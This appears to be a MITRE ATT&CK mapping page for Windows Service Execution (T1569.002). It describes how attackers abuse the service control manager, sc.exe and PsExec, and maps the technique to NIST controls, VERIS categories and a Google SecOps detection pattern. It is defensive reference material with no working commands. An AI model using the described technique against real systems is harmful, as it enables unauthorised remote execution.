Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and Net.
PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as PsExec and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| CA-07 | Continuous Monitoring | mitigates | T1569.002 | Service Execution | |
| CM-06 | Configuration Settings | mitigates | T1569.002 | Service Execution | |
| CM-05 | Access Restrictions for Change | mitigates | T1569.002 | Service Execution | |
| SI-03 | Malicious Code Protection | mitigates | T1569.002 | Service Execution | |
| SI-07 | Software, Firmware, and Information Integrity | mitigates | T1569.002 | Service Execution | |
| CM-02 | Baseline Configuration | mitigates | T1569.002 | Service Execution | |
| IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1569.002 | Service Execution | |
| CM-07 | Least Functionality | mitigates | T1569.002 | Service Execution | |
| SI-04 | System Monitoring | mitigates | T1569.002 | Service Execution | |
| AC-02 | Account Management | mitigates | T1569.002 | Service Execution | |
| AC-03 | Access Enforcement | mitigates | T1569.002 | Service Execution | |
| AC-05 | Separation of Duties | mitigates | T1569.002 | Service Execution | |
| AC-06 | Least Privilege | mitigates | T1569.002 | Service Execution |
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| action.hacking.variety.Use of stolen creds | Use of stolen or default authentication credentials (including credential stuffing) | related-to | T1569.002 | Service Execution | |
| action.hacking.variety.Abuse of functionality | Abuse of functionality. | related-to | T1569.002 | Service Execution | |
| action.malware.vector.Direct install | Directly installed or inserted by threat agent (after system access) | related-to | T1569.002 | Service Execution |
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| google_secops | Google Security Operations | technique_scores | T1569.002 | Service Execution |
Comments
Google Security Ops is able to trigger alerts based off command-line arguments and suspicious system process that could indicate abuse of Windows system service to execute malicious commands or code (e.g., "*\\execute\.bat").
This technique was scored as minimal based on low or uncertain detection coverage factor.
https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/windows/smbexec_py_service_installation.yaral
References
|